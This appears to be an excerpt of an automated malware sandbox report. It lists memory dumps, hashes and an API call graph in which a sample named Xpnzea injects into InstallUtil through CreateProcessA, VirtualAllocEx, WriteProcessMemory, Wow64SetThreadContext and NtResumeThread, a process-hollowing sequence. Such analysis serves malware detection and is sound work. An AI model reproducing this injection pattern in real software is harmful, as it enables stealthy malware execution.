                                              • Source File: 00000002.00000002.1627263431.0000000000CCD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00CCD000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_ccd000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                              • Instruction ID: 72a4cb4b4d4ffd363209a2a78df7b131f7379846e1aa41b337488f23517ef9f9
                                              • Opcode Fuzzy Hash: 0d1964494f132f00775c0e221f472ab769a33717f3edcd57285c8181465a4d2f
                                              • Instruction Fuzzy Hash: 7811D376504240DFCB05CF10D9C4B16BF72FB94324F24C5ADD9090B656C33AE956CBA2
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8945f01943e2b7e62dc46b646bbfbe509f2be0ead1c789f940255412ce7e9bb5
                                              • Instruction ID: 245fd9cee635c125c6146fb4b097af6fcbc9f49e55173ff0cbc2807a646eb122
                                              • Opcode Fuzzy Hash: 8945f01943e2b7e62dc46b646bbfbe509f2be0ead1c789f940255412ce7e9bb5
                                              • Instruction Fuzzy Hash: C3012D31A002259BCF25EFB985503AE7BF9AB49314F2414BADC09E7701E735C942CBD5
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 5a239b900ccaa5f5a8c3e36465a3a29b8733af7c13916b5a5dfe7fe51c8ee2db
                                              • Instruction ID: b40c7bfb45317ae7140fb214b31bf15b4c96f1e29cbed654c266e8247aab82c5
                                              • Opcode Fuzzy Hash: 5a239b900ccaa5f5a8c3e36465a3a29b8733af7c13916b5a5dfe7fe51c8ee2db
                                              • Instruction Fuzzy Hash: 51018F74A01249DFDB05EBBCF9516DC7BB2FB80704F0085E9C0059B296EF756B058742
                                              Memory Dump Source
                                              • Source File: 00000002.00000002.1628552276.0000000002650000.00000040.00000800.00020000.00000000.sdmp, Offset: 02650000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_2_2_2650000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 42fed8ab9f0fb4542a8ccc53e9adeff2e10c285d91241e3be9ebc70d55311064
                                              • Instruction ID: 157c9c209b736db6f36f3c7ac291bea9cfe6e3d4c3754ca2cde71dafd6f557cb
                                              • Opcode Fuzzy Hash: 42fed8ab9f0fb4542a8ccc53e9adeff2e10c285d91241e3be9ebc70d55311064
                                              • Instruction Fuzzy Hash: 00F01934A01209EFDB45FBBCF991ADD77B5FB84600F1086B8C4059B255EF716A049B92

                                              Execution Graph

                                              Execution Coverage:10%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:375
                                              Total number of Limit Nodes:38
618bcc2 56038->56037 56039 6180fa8 WriteProcessMemory 56038->56039 56040 6180fb0 WriteProcessMemory 56038->56040 56039->56038 56040->56038 56042 618bd53 56041->56042 56043 618cbde 56041->56043 56044 618bcc2 56042->56044 56047 6180fa8 WriteProcessMemory 56042->56047 56048 6180fb0 WriteProcessMemory 56042->56048 56045 618e838 2 API calls 56043->56045 56046 618e836 2 API calls 56043->56046 56045->56042 56046->56042 56047->56042 56048->56042 56050 618c3e1 56049->56050 56053 61811c8 NtResumeThread 56050->56053 56054 61811c1 NtResumeThread 56050->56054 56051 618bd53 56052 618bcc2 56051->56052 56055 6180fa8 WriteProcessMemory 56051->56055 56056 6180fb0 WriteProcessMemory 56051->56056 56053->56051 56054->56051 56055->56051 56056->56051 56059 618bd53 56057->56059 56058 618bcc2 56059->56057 56059->56058 56060 6180fa8 WriteProcessMemory 56059->56060 56061 6180fb0 WriteProcessMemory 56059->56061 56060->56059 56061->56059 56063 618bd53 56062->56063 56064 618bcc2 56063->56064 56065 6180fa8 WriteProcessMemory 56063->56065 56066 6180fb0 WriteProcessMemory 56063->56066 56065->56063 56066->56063 56068 6180ffc WriteProcessMemory 56067->56068 56070 6181095 56068->56070 56070->55907 56072 6180ffc WriteProcessMemory 56071->56072 56074 6181095 56072->56074 56074->55907 56076 618e985 56075->56076 56085 61808ea 56076->56085 56089 61808f0 56076->56089 56077 618e99e 56077->55949 56081 618e985 56080->56081 56083 61808ea Wow64SetThreadContext 56081->56083 56084 61808f0 Wow64SetThreadContext 56081->56084 56082 618e99e 56082->55949 56083->56082 56084->56082 56086 61808f0 Wow64SetThreadContext 56085->56086 56088 61809b1 56086->56088 56088->56077 56090 6180939 Wow64SetThreadContext 56089->56090 56092 61809b1 56090->56092 56092->56077 56094 618e79a 56093->56094 56095 618e7ce 56093->56095 56096 61808ea Wow64SetThreadContext 56094->56096 56097 61808f0 Wow64SetThreadContext 56094->56097 56095->55965 56096->56095 56097->56095 56099 618e7b5 56098->56099 56101 61808ea Wow64SetThreadContext 56099->56101 
56102 61808f0 Wow64SetThreadContext 56099->56102 56100 618e7ce 56100->55965 56101->56100 56102->56100 56104 618d20f 56103->56104 56105 618d231 56104->56105 56113 618d56a 56104->56113 56118 618d5df 56104->56118 56105->55982 56109 618d20f 56108->56109 56110 618d56a 2 API calls 56109->56110 56111 618d5df 2 API calls 56109->56111 56112 618d231 56109->56112 56110->56112 56111->56112 56112->55982 56114 618d578 56113->56114 56123 6180538 56114->56123 56127 618052c 56114->56127 56119 618d607 56118->56119 56121 6180538 CreateProcessA 56119->56121 56122 618052c CreateProcessA 56119->56122 56120 618db11 56121->56120 56122->56120 56124 61805b8 CreateProcessA 56123->56124 56126 61807b4 56124->56126 56129 61805b8 CreateProcessA 56127->56129 56130 61807b4 56129->56130 56132 6181211 NtResumeThread 56131->56132 56134 6181268 56132->56134 56134->55992 56136 61811c8 NtResumeThread 56135->56136 56138 6181268 56136->56138 56138->55992 56140 618e84d 56139->56140 56149 6180e48 56140->56149 56153 6180e50 56140->56153 56141 618e86f 56141->56011 56145 618e84d 56144->56145 56147 6180e48 VirtualAllocEx 56145->56147 56148 6180e50 VirtualAllocEx 56145->56148 56146 618e86f 56146->56011 56147->56146 56148->56146 56150 6180e94 VirtualAllocEx 56149->56150 56152 6180f0c 56150->56152 56152->56141 56154 6180e94 VirtualAllocEx 56153->56154 56156 6180f0c 56154->56156 56156->56141 56161 2b07de0 56162 2b07dfa 56161->56162 56163 2b07e0a 56162->56163 56167 6246234 56162->56167 56171 6246e1e 56162->56171 56174 62473f3 56162->56174 56168 6246253 56167->56168 56178 624d008 56168->56178 56173 624d008 VirtualProtect 56171->56173 56172 62401d7 56173->56172 56175 6247412 56174->56175 56177 624d008 VirtualProtect 56175->56177 56176 62401d7 56177->56176 56180 624d02f 56178->56180 56182 624d4e8 56180->56182 56183 624d531 VirtualProtect 56182->56183 56185 624627a 56183->56185 56157 619fca8 56158 619fcf7 NtProtectVirtualMemory 56157->56158 56160 619fd6f 56158->56160 56199 61981e8 56200 61981fd 56199->56200 56203 
6198374 56200->56203 56205 619837a 56203->56205 56204 6198497 56205->56204 56206 6181498 VirtualProtect 56205->56206 56207 61814a0 VirtualProtect 56205->56207 56206->56205 56207->56205 55759 624e6b0 55760 624e6f4 VirtualAlloc 55759->55760 55762 624e761 55760->55762 56186 edd030 56187 edd048 56186->56187 56188 edd0a3 56187->56188 56190 624dbd0 56187->56190 56191 624dc29 56190->56191 56194 624e160 56191->56194 56192 624dc5e 56195 624e18d 56194->56195 56196 624d008 VirtualProtect 56195->56196 56198 624e323 56195->56198 56197 624e314 56196->56197 56197->56192 56198->56192

                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0619FD5D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656832477.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6190000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 2706961497-188254238

                                              APIs
                                              • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 0619FD5D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656832477.0000000006190000.00000040.00000800.00020000.00000000.sdmp, Offset: 06190000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6190000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 2706961497-188254238
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 06181256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: cxrl
                                              • API String ID: 947044025-188254238
                                              APIs
                                              • NtResumeThread.NTDLL(?,?), ref: 06181256
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ResumeThread
                                              • String ID: cxrl
                                              • API String ID: 947044025-188254238

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0618079F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: cxrl$cxrl
                                              • API String ID: 963392458-3870225167

                                              APIs
                                              • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 0618079F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: CreateProcess
                                              • String ID: cxrl$cxrl
                                              • API String ID: 963392458-3870225167

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06181083
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: cxrl
                                              • API String ID: 3559483778-188254238

                                              APIs
                                              • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06181083
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: MemoryProcessWrite
                                              • String ID: cxrl
                                              • API String ID: 3559483778-188254238

                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06181544
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 544645111-188254238

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06180EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cxrl
                                              • API String ID: 4275171209-188254238

                                              APIs
                                              • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06180EFA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cxrl
                                              • API String ID: 4275171209-188254238

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0618099F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: cxrl
                                              • API String ID: 983334009-188254238

                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 06181544
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 544645111-188254238

                                              APIs
                                              • VirtualProtect.KERNELBASE(?,?,?,?), ref: 0624D58C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657382641.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6240000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ProtectVirtual
                                              • String ID: cxrl
                                              • API String ID: 544645111-188254238

                                              APIs
                                              • Wow64SetThreadContext.KERNEL32(?,?), ref: 0618099F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656750450.0000000006180000.00000040.00000800.00020000.00000000.sdmp, Offset: 06180000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6180000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: ContextThreadWow64
                                              • String ID: cxrl
                                              • API String ID: 983334009-188254238
                                              APIs
                                              • VirtualAlloc.KERNELBASE(?,?,?,?), ref: 0624E74F
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1657382641.0000000006240000.00000040.00000800.00020000.00000000.sdmp, Offset: 06240000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6240000_Xpnzea.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID: cxrl
                                              • API String ID: 4275171209-188254238
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6000000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e5d29ade05fbcd946e8d4113a8d5025a2f48383b4fff2727c2abd2519a8e5cfd
                                              • Instruction ID: 1f2811c020c69ff3283a4dc5983df02c89dfc7c92570c85487e86b899f0479b8
                                              • Opcode Fuzzy Hash: e5d29ade05fbcd946e8d4113a8d5025a2f48383b4fff2727c2abd2519a8e5cfd
                                              • Instruction Fuzzy Hash: E0F1D134D01208DFEB98DFE5E9846ACBBB2FF89305F20516AE416A7390DB305985CF41
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b5ded77931032da4029c614e42ba6cee5e0c4415c7dad685d475f84883f6f6c2
                                              • Instruction ID: 477fa0d0337f8fcb192a1f9f354e6b15ec63d0a14c87fdba4a664bf24eb974ab
                                              • Opcode Fuzzy Hash: b5ded77931032da4029c614e42ba6cee5e0c4415c7dad685d475f84883f6f6c2
                                              • Instruction Fuzzy Hash: 61C16075A002289FDB98DB69C945BDDBBF6BF88700F148099E509AB351CB70DD81CF61
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1e5c1471c34b9c4d7848a28b43dac234cf982ad1a54b9551a6047762d7116621
                                              • Instruction ID: be394a6ce965a61b3c0ae3e2c3275d4d46c0e436372ba52d9b28ffaf0ff2a13a
                                              • Opcode Fuzzy Hash: 1e5c1471c34b9c4d7848a28b43dac234cf982ad1a54b9551a6047762d7116621
                                              • Instruction Fuzzy Hash: 0AA1BF39B412159FCB45CFA9D985AADBBF2FF88311F14806AE811EB291CB35DE41CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656414956.0000000006000000.00000040.00000800.00020000.00000000.sdmp, Offset: 06000000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6000000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b42b5a27c04116d9df2026adbd206c53e40cf325bea60fc29c4b0a4cb5626afc
                                              • Instruction ID: 2f74c59607a238a1e153693ddb1757d9d9560cc5f7cf6ee764309362b25c91ed
                                              • Opcode Fuzzy Hash: b42b5a27c04116d9df2026adbd206c53e40cf325bea60fc29c4b0a4cb5626afc
                                              • Instruction Fuzzy Hash: E0A1B134E01209CFEB99DFE5D8456AEBBB2FF89301F10806AD416B7294DB345986CF90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 262970de00fe2ceb0dda8d5f8b7bc8ac42498fe1e859ef813f208ddf179d59cf
                                              • Instruction ID: 76b9565a7dd0bb405c991e8d3e62b7922b20850277233e134bfff4d78d9b941f
                                              • Opcode Fuzzy Hash: 262970de00fe2ceb0dda8d5f8b7bc8ac42498fe1e859ef813f208ddf179d59cf
                                              • Instruction Fuzzy Hash: 8CA1EE34A50229DFCB44DFA4D894A9DBBB2FF89304F558159E805AB361DF70EC86CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3f8c74c053122044fb87f57157be9dc3e59251f30b35e10c242c078fec4cfeca
                                              • Instruction ID: a578e6152d37d051f29a85d4705758ece48d7d0ce0c43d5418037b1d7a9e8425
                                              • Opcode Fuzzy Hash: 3f8c74c053122044fb87f57157be9dc3e59251f30b35e10c242c078fec4cfeca
                                              • Instruction Fuzzy Hash: AD816E79A40619CFD754DFA8C484A9DBBF5FF88350B1581A9E806DB360DB30EC85CB90
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 553a02006985c72b14fb0ae898ceda06c2c6835041d3ff3e5f25cd7528f7d3c5
                                              • Instruction ID: 2dbfbb222f873309c1353a5a64772e7a1ce75c1f746f15f34c3f840f9022c949
                                              • Opcode Fuzzy Hash: 553a02006985c72b14fb0ae898ceda06c2c6835041d3ff3e5f25cd7528f7d3c5
                                              • Instruction Fuzzy Hash: B051FE74B003109FD79AAF74C85466E7BF6AF89210B54446DE402DB3A0DF35ED86CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c18997ac85d8b6bddab7fe2d4bff1ba107adff4ab2ac47ad47ddebb73b3029d9
                                              • Instruction ID: a6aa3537a16c860b4c6dfd1ff85a9d37c2a80bb5c470fce6bd20e913a2b03857
                                              • Opcode Fuzzy Hash: c18997ac85d8b6bddab7fe2d4bff1ba107adff4ab2ac47ad47ddebb73b3029d9
                                              • Instruction Fuzzy Hash: 9151F435A006268FC700DFA8D884AAEFBB5FF89320B158595E5259B341C730FD96CBD0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e780c941c9b388c28713ea594fc8e6d4f0b2cf3daf8a82e5f97d691981e614a3
                                              • Instruction ID: 507020ddb02bf4aebcbeee6feee955d85c18a0478b638476cbfd0aa0e80e4c7e
                                              • Opcode Fuzzy Hash: e780c941c9b388c28713ea594fc8e6d4f0b2cf3daf8a82e5f97d691981e614a3
                                              • Instruction Fuzzy Hash: 8E51EF757042259FD7849F39C854B6E3BEAEF896107588069F40ACB3E1CE74ED42CBA0
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 047e9aa2083a9a4170ae69378789a489b9c7945aebfa8a8cddfdd704b49bb816
                                              • Instruction ID: cfa8b2396e420cd3a2d20d7ad66fc5c679d9e33769902d22ed9222435cbe40f0
                                              • Opcode Fuzzy Hash: 047e9aa2083a9a4170ae69378789a489b9c7945aebfa8a8cddfdd704b49bb816
                                              • Instruction Fuzzy Hash: 8D517234A00204CFDB59DF65D88DBE9BBF2FB88311F24C5A6D805AB294DB749D89CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c0f7d4a421ed360dd61bb6c5f36fd40a4f38743a6e8d6e862f3c657f7f0e46c9
                                              • Instruction ID: 6bd804530ffefce5005c1d9217ad038a96cb03e7ad7de9dc1079215fa51a94ab
                                              • Opcode Fuzzy Hash: c0f7d4a421ed360dd61bb6c5f36fd40a4f38743a6e8d6e862f3c657f7f0e46c9
                                              • Instruction Fuzzy Hash: 70510C76600100AFCB459FA8D905E697BF6FF8D31471A84D4E2099B272DB36DC61EB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1078b456c0beb2a8098792a45cbf712ef92468ebe27366dfb0cf0da1f808242b
                                              • Instruction ID: e00bf2c8348e20a6c12ff0420352557d6b55edc95d133438c683faab0bb9f353
                                              • Opcode Fuzzy Hash: 1078b456c0beb2a8098792a45cbf712ef92468ebe27366dfb0cf0da1f808242b
                                              • Instruction Fuzzy Hash: 6251BC317006159FEB59AF69D894BAE3BE6EF84300F148469E805CB391CB78DC86CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 61c24017c3b151d0c6e352aee07d9c71ff444a30c03868398864fcaf8e7284dd
                                              • Instruction ID: 7ed63c8394f4a8c7a65d4f7004bddced50e09645efc8fdf32eaa3e069db39b95
                                              • Opcode Fuzzy Hash: 61c24017c3b151d0c6e352aee07d9c71ff444a30c03868398864fcaf8e7284dd
                                              • Instruction Fuzzy Hash: 0B5156342047519FD365DF3AD84038B7FF6AFC4310F108A69E1568B2A1DB74E989CBA2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e3a85a077d3c143ee76c23b50fb94a30837d28c487d774a5cc650f0a05496253
                                              • Instruction ID: 1c62297a0f1608dc57411c1f0decf865d1c6d8d57d740e7ab6dfdba7f2f8cc62
                                              • Opcode Fuzzy Hash: e3a85a077d3c143ee76c23b50fb94a30837d28c487d774a5cc650f0a05496253
                                              • Instruction Fuzzy Hash: 63515134A00204CFDB55DB65D88DBE9BBF2FB88311F24C5A6D805AB294DB74AD89CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3cdf0c1a4532b7769b1e985a642d8bfd4d2c39b91763abc8bba9e60eb87d8a6a
                                              • Instruction ID: 5b3b5d4f3fdfa6d846716375eb9b5f52bd0cb3f4972a3c32217d3232fad3ca6c
                                              • Opcode Fuzzy Hash: 3cdf0c1a4532b7769b1e985a642d8bfd4d2c39b91763abc8bba9e60eb87d8a6a
                                              • Instruction Fuzzy Hash: 0A41B734B506699FCB84EB64C854AEE7BBBAFC9700F104029E416AB354CF70AC46CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1656504160.0000000006020000.00000040.00000800.00020000.00000000.sdmp, Offset: 06020000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6020000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1942835cb683eeaf35c77e9a47488bf4f6edcb020fa42ead72c8c4f4fa0a2fbf
                                              • Instruction ID: 7450a258816e2eb5a15d7d9bb78d177cd081a2df5d3a8e9445ea421a2e194888
                                              • Opcode Fuzzy Hash: 1942835cb683eeaf35c77e9a47488bf4f6edcb020fa42ead72c8c4f4fa0a2fbf
                                              • Instruction Fuzzy Hash: 13515034B00619DFCB04DF64E898AAEBBB6FF89711F108119F50297364DF749986CB91
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1627766007.0000000002B00000.00000040.00000800.00020000.00000000.sdmp, Offset: 02B00000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_2b00000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 557401c66c63400f0a846489d7fb6c861426a94a694fee099ff56d985aed1f71
                                              • Instruction ID: 1197c276694639edd3fa01cb8f3195a6815fd74ede64934f9a9a2534158fc634
                                              • Opcode Fuzzy Hash: 557401c66c63400f0a846489d7fb6c861426a94a694fee099ff56d985aed1f71
                                              • Instruction Fuzzy Hash: E6514E34A00204CFDB55DF65D88DBA9BBF2FB88315F24C5A6D805AB294CB74AD89CB50
                                              Memory Dump Source
